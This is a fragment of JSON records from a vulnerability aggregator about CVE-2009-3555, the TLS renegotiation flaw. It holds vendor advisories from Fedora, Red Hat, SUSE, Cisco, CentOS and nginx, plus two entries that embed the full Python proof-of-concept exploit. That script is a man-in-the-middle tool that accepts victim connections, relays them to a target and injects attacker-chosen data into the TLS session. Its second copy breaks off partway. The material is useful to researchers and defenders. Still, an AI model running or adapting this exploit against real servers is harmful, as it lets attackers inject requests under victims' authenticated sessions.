", "modified": "2010-06-22T17:21:05", "published": "2010-06-22T17:21:05", "id": "FEDORA:6A214110D58", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: gnutls-2.8.6-2.fc13", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications. Applications built with NSS can support SSL v2 and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509 v3 certificates, and other security standards. ", "modified": "2010-03-23T02:03:18", "published": "2010-03-23T02:03:18", "id": "FEDORA:E3F6C10FD89", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: nss-3.12.6-1.2.fc11", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "GnuTLS is a project that aims to develop a library which provides a secure layer, over a reliable transport layer. Currently the GnuTLS library implem ents the proposed standards by the IETF's TLS working group. ", "modified": "2010-06-25T18:15:19", "published": "2010-06-25T18:15:19", "id": "FEDORA:DB226111816", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: gnutls-2.8.6-2.fc12", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Tomcat can use the Apache Portable Runtime to provide superior scalability, performance, and better integration with native server technologies. The Apache Portable Runtime is a highly portable library that is at the heart of Apache HTTP Server 2.x. 
APR has many uses, including access to advanced IO functionality (such as sendfile, epoll and OpenSSL), OS level functionality (random number generation, system status, etc), and native process handling (shared memory, NT pipes and Unix sockets). This package contains the Tomcat native library which provides support for using APR in Tomcat. ", "modified": "2009-12-18T04:33:34", "published": "2009-12-18T04:33:34", "id": "FEDORA:58E1828ED7E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: tomcat-native-1.1.18-1.fc11", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "nginx": [{"lastseen": "2019-05-29T17:19:07", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "edition": 2, "description": "The renegotiation vulnerability in SSL protocol\nSeverity: major\nCVE-2009-3555\nNot vulnerable: 0.8.23+, 0.7.64+\nVulnerable: 0.1.0-0.8.22", "modified": "2009-11-09T17:30:00", "published": "2009-11-09T17:30:00", "id": "NGINX:CVE-2009-3555", "href": "http://nginx.org/en/security_advisories.html", "type": "nginx", "title": "The renegotiation vulnerability in SSL protocol", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:03", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "The IBM 1.4.2 SR13-FP4 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handle session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. (CVE-2009-3555)\n\nThis update disables renegotiation in the non-default IBM JSSE2 provider\nfor the Java Secure Socket Extension (JSSE) component. 
The default JSSE\nprovider is not updated with this fix. Refer to the IBMJSSE2 Provider\nReference Guide, linked to in the References, for instructions on how to\nconfigure the IBM Java 2 Runtime Environment to use the JSSE2 provider by\ndefault.\n\nWhen using the JSSE2 provider, unsafe renegotiation can be re-enabled using\nthe com.ibm.jsse2.renegotiate property. Refer to the following\nKnowledgebase article for details:\nhttp://kbase.redhat.com/faq/docs/DOC-20491\n\nThis update also fixes the following bug:\n\n* the libjaasauth.so file was missing from the java-1.4.2-ibm packages for\nthe Intel Itanium architecture (.ia64.rpm). This update adds the file to\nthe packages for the Itanium architecture, which resolves this issue.\n(BZ#572577)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP4 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.", "modified": "2018-05-26T04:26:19", "published": "2010-03-17T04:00:00", "id": "RHSA-2010:0155", "href": "https://access.redhat.com/errata/RHSA-2010:0155", "type": "redhat", "title": "(RHSA-2010:0155) Moderate: java-1.4.2-ibm security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:24", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. 
This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nAll openssl097a users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to take\neffect, all services linked to the openssl097a library must be restarted,\nor the system rebooted.", "modified": "2017-09-08T12:19:40", "published": "2010-03-25T04:00:00", "id": "RHSA-2010:0164", "href": "https://access.redhat.com/errata/RHSA-2010:0164", "type": "redhat", "title": "(RHSA-2010:0164) Moderate: openssl097a security update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T12:25:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "The TLS/SSLv3 protocol as implemented in openssl prior to this update was not able to associate already sent data to a renegotiated connection. This allowed man-in-the-middle attackers to inject HTTP requests in a HTTPS session without being noticed. For example Apache's mod_ssl was vulnerable to this kind of attack because it uses openssl. It is believed that this vulnerability is actively exploited in the wild to get access to HTTPS protected web-sites. Please note that renegotiation will be disabled for any application using openssl by this update and may cause problems in some cases. Additionally this attack is not limited to HTTP.\n#### Solution\nThere is no work-around known. Please install the update. 
Moblin packages will be released later.", "edition": 1, "modified": "2009-11-18T09:50:39", "published": "2009-11-18T09:50:39", "id": "SUSE-SA:2009:057", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00009.html", "type": "suse", "title": "man-in-the-middle attack in openssl", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "cisco": [{"lastseen": "2020-12-24T11:42:04", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "Multiple Transport Layer Security (TLS) implementations contain a vulnerability when renegotiating a TLS session that could allow an unauthenticated, remote attacker to conduct a man-in-the-middle attack.\n\nThe vulnerability exists during a TLS renegotiation process. If an attacker can intercept traffic from a client to a TLS server, the attacker could stage a rogue TLS server to intercept that traffic and appear to authenticate the client to what the client thinks is the desired TLS server. The attacker is then able to authenticate to the legitimate TLS server and thus stage a man-in-the-middle attack. However, the attacker would not be able to view the contents of the session and would only be able to inject data or requests into it.\n\nProof-of-concept code that exploits this vulnerability is publicly available.\n\nOpenSSL has confirmed this vulnerability in a changelog and released updated software.\n\nTo exploit this vulnerability, the attacker must be able to intercept traffic from a TLS client to a TLS server. In many cases, this may require the attacker to have access to a network that is adjacent to the targeted user's system. 
Another possibility would be for the attacker to have access to a network that is adjacent to a legitimate TLS server.\n\nThis vulnerability is likely to affect multiple implementations of TLS.", "modified": "2012-08-14T16:24:54", "published": "2009-11-05T19:53:52", "id": "CISCO-SA-20091105-CVE-2009-3555", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20091105-CVE-2009-3555", "type": "cisco", "title": "Transport Layer Security Renegotiation Remote Man-in-the-Middle Attack Vulnerability", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:25:54", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0164\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nAll openssl097a users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
For the update to take\neffect, all services linked to the openssl097a library must be restarted,\nor the system rebooted.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028633.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028634.html\n\n**Affected packages:**\nopenssl097a\n\n**Upstream details at:**\n", "edition": 3, "modified": "2010-03-27T17:44:36", "published": "2010-03-27T17:44:36", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/028633.html", "id": "CESA-2010:0164", "title": "openssl097a security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-12-20T18:24:56", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0165\n\n\nNetwork Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Applications built with NSS can support SSLv2, SSLv3, TLS,\nand other security standards.\n\nNetscape Portable Runtime (NSPR) provides platform independence for non-GUI\noperating system facilities. These facilities include threads, thread\nsynchronization, normal file and network I/O, interval timing, calendar\ntime, basic memory management (malloc and free), and shared library\nlinking.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. 
This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nUsers of Red Hat Certificate System 7.3 and 8.0 should review the following\nKnowledgebase article before installing this update:\nhttp://kbase.redhat.com/faq/docs/DOC-28439\n\nAll users of NSS are advised to upgrade to these updated packages, which\nupdate NSS to version 3.12.6. This erratum also updates the NSPR packages\nto the version required by NSS 3.12.6. All running applications using the\nNSS library must be restarted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028639.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028640.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028645.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/028646.html\n\n**Affected packages:**\nnspr\nnspr-devel\nnss\nnss-devel\nnss-pkcs11-devel\nnss-tools\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0165.html", "edition": 3, "modified": "2010-03-28T20:10:58", "published": "2010-03-28T15:36:50", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/028640.html", "id": "CESA-2010:0165", "title": "nspr, nss security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T12:46:47", "description": "TLS Renegotiation Vulnerability PoC Exploit. CVE-2009-3555. 
Remote exploits for multiple platform", "published": "2009-12-21T00:00:00", "type": "exploitdb", "title": "TLS Renegotiation Vulnerability PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-21T00:00:00", "id": "EDB-ID:10579", "href": "https://www.exploit-db.com/exploits/10579/", "sourceData": "#!/usr/bin/env python\r\n\r\n######################################\r\n# #\r\n# RedTeam Pentesting GmbH #\r\n# kontakt@redteam-pentesting.de #\r\n# http://www.redteam-pentesting.de #\r\n# #\r\n######################################\r\n\r\n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555)\r\n\r\n# License\r\n# -------\r\n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/\r\n\r\n# Timeline\r\n# --------\r\n# 2009-12-21 initial public release\r\n\r\n# Known Issues\r\n# ------------\r\n# Firefox: if it fails connecting to a TLS site too often, falls back to\r\n# issuing SSLv2 ClientHello only until browser is restarted\r\n#\r\n# wget: attempts SSLv2 ClientHello by default\r\n\r\n# References\r\n# ----------\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n# http://www.phonefactor.com/sslgap\r\n# http://www.extendedsubset.com/\r\n# http://www.g-sec.lu/practicaltls.pdf\r\n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01\r\n\r\nimport tlslite\r\nimport tlslite.api\r\nimport tlslite.messages\r\nimport tlslite.constants\r\nimport struct\r\nimport socket\r\nimport threading\r\nimport array\r\nimport sys\r\nimport optparse\r\n\r\n\r\nif not hasattr(threading.Thread, 'name'):\r\n # emulate python 2.6 threading module for earlier versions\r\n threading.current_thread = threading.currentThread\r\n setattr(threading.Thread, 'name',\r\n property(threading.Thread.getName, threading.Thread.setName))\r\n\r\ndef forward(sock1, sock2):\r\n sock1.settimeout(1.0)\r\n while True:\r\n try:\r\n data = sock1.recv(4096)\r\n if not data:\r\n return\r\n sock2.send(data)\r\n except socket.error, ex_error:\r\n if 
ex_error[0] == 104: # Connection reset by peer\r\n return\r\n except socket.timeout, ex_timeout:\r\n pass\r\n\r\n\r\nclass MessageWrapper(object):\r\n def __init__(self, version = (3, 1), ssl2 = False):\r\n self.contentType = tlslite.messages.ContentType.handshake\r\n self.ssl2 = ssl2\r\n self.client_version = version\r\n\r\n def setType(self, type):\r\n self.contentType = type\r\n\r\n def addBytes(self, bytes):\r\n self.bytes = bytes\r\n\r\n def write(self, trial=False):\r\n if trial:\r\n raise Exception('Unsupported')\r\n return array.array('B', self.bytes)\r\n\r\ndef send_record(sock, msg_type, version_major, version_minor, record):\r\n msg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record))\r\n if type(record) != str:\r\n msg += record.tostring()\r\n else:\r\n msg += record\r\n sock.send(msg)\r\n\r\ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)):\r\n msg = MessageWrapper(version)\r\n msg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes))\r\n msg.setType(type)\r\n for dummy in sslsock._sendMsg(msg, True):\r\n pass\r\n\r\ndef decrypt_record(sslsock, type, recordbytes):\r\n for result in sslsock._decryptRecord(type, array.array('B', recordbytes)):\r\n pass\r\n return result\r\n\r\ndef recv_record(sock):\r\n try:\r\n header = sock.recv(5)\r\n if not header:\r\n return None, None, None, None\r\n msg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header)\r\n record = ''\r\n while len(record) != msg_length:\r\n record += sock.recv(msg_length - len(record))\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n except socket.error, ex:\r\n if ex[0] == 104: # Connection reset by peer\r\n return\r\n\r\ndef recv_clienthello(sock):\r\n header_bytes = []\r\n header_bytes.append(sock.recv(1))\r\n header_bytes[0] = struct.unpack('!B', header_bytes[0])[0]\r\n if header_bytes[0] & 0x80:\r\n # Version 2.0 Client \"Record Layer\"\r\n header_bytes.append(sock.recv(1))\r\n 
header_bytes[1] = struct.unpack('!B', header_bytes[1])[0]\r\n msg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1]\r\n msg_version_major = 2\r\n msg_version_minor = 0\r\n msg_type = tlslite.constants.ContentType.handshake\r\n record = sock.recv(msg_length)\r\n else:\r\n header = sock.recv(4)\r\n msg_type = header_bytes[0]\r\n msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header)\r\n record = sock.recv(msg_length)\r\n\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n\r\ndef send_hello_request(sock):\r\n sock.send(\"\\x16\" # Record Layer: Handshake Message\r\n +\"\\x03\\x01\" # Record Layer Version: TLS 1.0\r\n +\"\\x00\\x04\" # Record Layer Length: 4\r\n +\"\\x00\" # Handshake Message Type: Hello Request\r\n +\"\\x00\\x00\\x00\") # Handshake Message Length: 0\r\n\r\ndef send_protocol_version_alert(sock):\r\n sock.send(\"\\x15\" # Record Layer: Alert\"\r\n +\"\\x03\\x01\" # Record Layer Version: TLS 1.0\r\n +\"\\x00\\x02\" # Record Layer Length: 2\r\n +\"\\x00\" # Alert Message: fatal\r\n +\"\\x46\") # Alert Message: protocol version\r\n\r\n\r\ndef handle_victim(victim, options, mitmcount):\r\n\r\n if options.one_shot and mitmcount != 0:\r\n print threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only'\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n t1 = threading.Thread(target=forward, args=(sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sock))\r\n t2.start()\r\n\r\n t1.join()\r\n sock.close()\r\n\r\n t2.join()\r\n victim.close()\r\n 
return\r\n\r\n # obtain initial \"client hello\" message\r\n msg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim)\r\n if msg_version_major == 2:\r\n print threading.current_thread().name, \"client sent SSLv2 client hello message, exiting thread\"\r\n return\r\n\r\n tls_version = (msg_version_major, msg_version_minor)\r\n type, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39])\r\n resume_session = (session_id_length != 0)\r\n if resume_session:\r\n print threading.current_thread().name, \"client attempting to resume session\"\r\n\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n\r\n sslsock = tlslite.api.TLSConnection(sock)\r\n handshake_settings = tlslite.HandshakeSettings.HandshakeSettings()\r\n handshake_settings.minVersion = tls_version\r\n handshake_settings.maxVersion = tls_version\r\n sslsock.handshakeClientCert(settings = handshake_settings)\r\n\r\n # inject prefix\r\n sslsock.write(options.inject)\r\n print threading.current_thread().name, 'Injected %s' % repr(options.inject)\r\n\r\n # send original \"client hello\" message over the encrypted channel\r\n send_encapsulated(sslsock, 22, hello_msg, tls_version)\r\n\r\n # now receive serveral TLS messages from the server, decrypt them, and forward\r\n # them to the client, until the server sends \"server hello done\"\r\n # these messages include \"server hello\", \"certificate\", \"server key exchange\",\r\n # unless the client is trying to resume a previous session\r\n print threading.current_thread().name, \"about to receive server handshake 
messages\"\r\n server_handshake_done = False\r\n while not server_handshake_done:\r\n msg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock)\r\n if result:\r\n result = decrypt_record(sslsock, msg_type, result)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n if result[0] == 0x0e: # server hello done - should terminate handshake\r\n server_handshake_done = True\r\n elif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant\r\n server_handshake_done = True\r\n else:\r\n print threading.current_thread().name, 'receive from server failed, exiting thread'\r\n return\r\n print threading.current_thread().name, \"server handshake done\"\r\n\r\n\r\n # now its the the client's turn to send some messages, e.g.\r\n # \"client key exchange\" and \"change cipher spec\"\r\n print threading.current_thread().name, \"about to receive client handshake messages\"\r\n handshake_finished = False\r\n while not handshake_finished:\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n print threading.current_thread().name, msg_type\r\n send_encapsulated(sslsock, msg_type, record, tls_version)\r\n if msg_type == 0x14: # change cipher spec\r\n handshake_finished = True\r\n\r\n print threading.current_thread().name, \"client handshake done\"\r\n\r\n # message after \"change cipher spec\" must be sent in the \"clear\"\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n send_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record)\r\n\r\n # server should now send \"change cipher spec\" message, we decrypt and send that to the victim\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\r\n result = decrypt_record(sslsock, msg_type, record)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n\r\n # finalize handshake\r\n msg_type, msg_version_major, 
msg_version_minor, record = recv_record(sslsock.sock)\r\n if record:\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, record)\r\n else:\r\n sslsock.sock.close()\r\n victim.close()\r\n del sslsock\r\n return\r\n\r\n\r\n\r\n # the rest is just forwarding TLS records between both parties,\r\n # which we cannot interfere with anymore, apart from dropping server\r\n # responses\r\n if options.drop:\r\n sslsock.sock.close()\r\n del sslsock\r\n else:\r\n t1 = threading.Thread(target=forward, args=(sslsock.sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sslsock.sock))\r\n t2.start()\r\n\r\n if not options.drop:\r\n t1.join()\r\n sslsock.sock.close()\r\n\r\n t2.join()\r\n victim.close()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = optparse.OptionParser()\r\n parser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443)\r\n parser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0')\r\n parser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' )\r\n parser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA')\r\n parser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE')\r\n parser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA')\r\n parser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections')\r\n parser.add_option('-d', '--drop-responses', dest='drop', action=\"store_true\", default=False, help='drop server responses after renegotiating')\r\n\r\n (options, args) = parser.parse_args()\r\n\r\n if len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1:\r\n print 
'Exactly one injection option must be specified'\r\n sys.exit(1)\r\n\r\n if options.inject_file:\r\n try:\r\n options.inject = open(options.inject_file, 'r').read()\r\n except IOError, ex:\r\n print ex\r\n sys.exit(1)\r\n\r\n if options.inject_base64:\r\n import base64\r\n try:\r\n options.inject = base64.decodestring(options.inject_base64)\r\n except base64.binascii.Error, ex:\r\n print 'Error decoding base64 data: %s' % ex\r\n sys.exit(1)\r\n\r\n\r\n if not options.listen_port or \\\r\n not options.bind_address or \\\r\n not options.target or \\\r\n not options.inject:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n target = options.target.split(':')\r\n if len(target)==2:\r\n try:\r\n target[1] = int(target[1])\r\n except ValueError:\r\n target[1] = None\r\n if len(target)!=2 or not target[0] or not target[1]:\r\n print 'Target \\'%s\\' not in format HOST:PORT' % options.target\r\n sys.exit(1)\r\n\r\n options.target = tuple(target)\r\n\r\n try:\r\n listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n listensocket.bind((options.bind_address, options.listen_port))\r\n print 'Listening on %s:%u' % (options.bind_address, options.listen_port)\r\n except socket.error, ex:\r\n print 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port)\r\n print 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n listensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n listensocket.listen(5)\r\n\r\n mitmcount = 0\r\n\r\n while True:\r\n try:\r\n victim, victimaddr = listensocket.accept()\r\n print 'New connection from %s:%u' % victimaddr\r\n\r\n threading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start()\r\n mitmcount += 1\r\n\r\n except KeyboardInterrupt, ex:\r\n print '\\nAborted by user, exiting...'\r\n listensocket.close()\r\n sys.exit(1)\r\n\r\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 
"https://www.exploit-db.com/download/10579/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:50", "description": "\nTLS - Renegotiation", "edition": 1, "published": "2009-12-21T00:00:00", "title": "TLS - Renegotiation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-12-21T00:00:00", "id": "EXPLOITPACK:8B4E7E8DAE5A13C8250C6C33307CD66C", "href": "", "sourceData": "#!/usr/bin/env python\n\n######################################\n# #\n# RedTeam Pentesting GmbH #\n# kontakt@redteam-pentesting.de #\n# http://www.redteam-pentesting.de #\n# #\n######################################\n\n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555)\n\n# License\n# -------\n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/\n\n# Timeline\n# --------\n# 2009-12-21 initial public release\n\n# Known Issues\n# ------------\n# Firefox: if it fails connecting to a TLS site too often, falls back to\n# issuing SSLv2 ClientHello only until browser is restarted\n#\n# wget: attempts SSLv2 ClientHello by default\n\n# References\n# ----------\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n# http://www.phonefactor.com/sslgap\n# http://www.extendedsubset.com/\n# http://www.g-sec.lu/practicaltls.pdf\n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01\n\nimport tlslite\nimport tlslite.api\nimport tlslite.messages\nimport tlslite.constants\nimport struct\nimport socket\nimport threading\nimport array\nimport sys\nimport optparse\n\n\nif not hasattr(threading.Thread, 'name'):\n # emulate python 2.6 threading module for earlier versions\n threading.current_thread = threading.currentThread\n setattr(threading.Thread, 'name',\n property(threading.Thread.getName, threading.Thread.setName))\n\ndef forward(sock1, sock2):\n sock1.settimeout(1.0)\n while True:\n try:\n data = sock1.recv(4096)\n if not data:\n return\n sock2.send(data)\n except socket.error, ex_error:\n if ex_error[0] == 104: # Connection 
reset by peer\n return\n except socket.timeout, ex_timeout:\n pass\n\n\nclass MessageWrapper(object):\n def __init__(self, version = (3, 1), ssl2 = False):\n self.contentType = tlslite.messages.ContentType.handshake\n self.ssl2 = ssl2\n self.client_version = version\n\n def setType(self, type):\n self.contentType = type\n\n def addBytes(self, bytes):\n self.bytes = bytes\n\n def write(self, trial=False):\n if trial:\n raise Exception('Unsupported')\n return array.array('B', self.bytes)\n\ndef send_record(sock, msg_type, version_major, version_minor, record):\n msg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record))\n if type(record) != str:\n msg += record.tostring()\n else:\n msg += record\n sock.send(msg)\n\ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)):\n msg = MessageWrapper(version)\n msg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes))\n msg.setType(type)\n for dummy in sslsock._sendMsg(msg, True):\n pass\n\ndef decrypt_record(sslsock, type, recordbytes):\n for result in sslsock._decryptRecord(type, array.array('B', recordbytes)):\n pass\n return result\n\ndef recv_record(sock):\n try:\n header = sock.recv(5)\n if not header:\n return None, None, None, None\n msg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header)\n record = ''\n while len(record) != msg_length:\n record += sock.recv(msg_length - len(record))\n return msg_type, msg_version_major, msg_version_minor, record\n except socket.error, ex:\n if ex[0] == 104: # Connection reset by peer\n return\n\ndef recv_clienthello(sock):\n header_bytes = []\n header_bytes.append(sock.recv(1))\n header_bytes[0] = struct.unpack('!B', header_bytes[0])[0]\n if header_bytes[0] & 0x80:\n # Version 2.0 Client \"Record Layer\"\n header_bytes.append(sock.recv(1))\n header_bytes[1] = struct.unpack('!B', header_bytes[1])[0]\n msg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1]\n msg_version_major = 2\n msg_version_minor = 
